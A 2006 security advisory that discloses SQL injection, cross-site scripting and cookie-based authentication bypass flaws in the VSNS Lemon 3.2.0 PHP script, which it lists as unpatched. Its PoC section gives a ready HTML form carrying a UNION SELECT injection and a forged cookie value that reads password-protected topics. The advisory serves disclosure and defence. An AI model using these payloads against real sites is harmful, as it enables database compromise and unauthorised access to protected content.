Multiple Vulnerabilities in VSNS Lemon

Summary

Vulnerability
Multiple Vulnerabilities in VSNS Lemon
Discovered
2006.03.27
Last Update
2006.04.06 Exploitation code published
ID
EV0106
CVE
CVE-2006-1553 CVE-2006-1554 CVE-2006-1555
Risk Level
medium
Type
Multiple Vulnerabilities
Status
Unpatched. No reply from developer(s)
Vendor
Tachyon (http://tachyondecay.net/)
Vulnerable Software
VSNS Lemon
Version
3.2.0
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple Vulnerabilities found in VSNS Lemon script.

1. SQL Injection.

Vulnerable script: functions/final_functions.php

Variable $id is not properly sanitized before being used in SQL query. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

2. Cross-Site Scripting.

Adding comment form. Parameter 'name' is not properly sanitized. This can be used to post arbitrary HTML or JavaScript code.

3. Cookie-Based Authentication Bypass.

There is a possibility to bypass authentication for pasword-protected articles. Password-checking function dont make password comparisson, just check cookie value for existance.

PoC/Exploit

1. SQL Injection Example.

  • <form method="post" action="http://[host]/vsns/index.php">
  • <input type="hidden" name="towel" value="checkpass">
  • <input name="id" value="9999' union select 123,4,5,6/*">
  • <input type="password" name="password" value="123">
  • <input type="submit" value="Go">
  • </form>

2. Cross-Site Scripting Example

Add Comment.

Example URL: http://[host]/vsns/index.php?towel=archive&type=id&id=1#vsns_comments_display

Name: [XSS]

3. Authentication Bypass Example.

Read any password-protected topic:

Cookie: vsns[topic_id] = 1

Solution.

Solution for "Multiple Vulnerabilities in VSNS Lemon" is not available. Check Tachyon website for updates.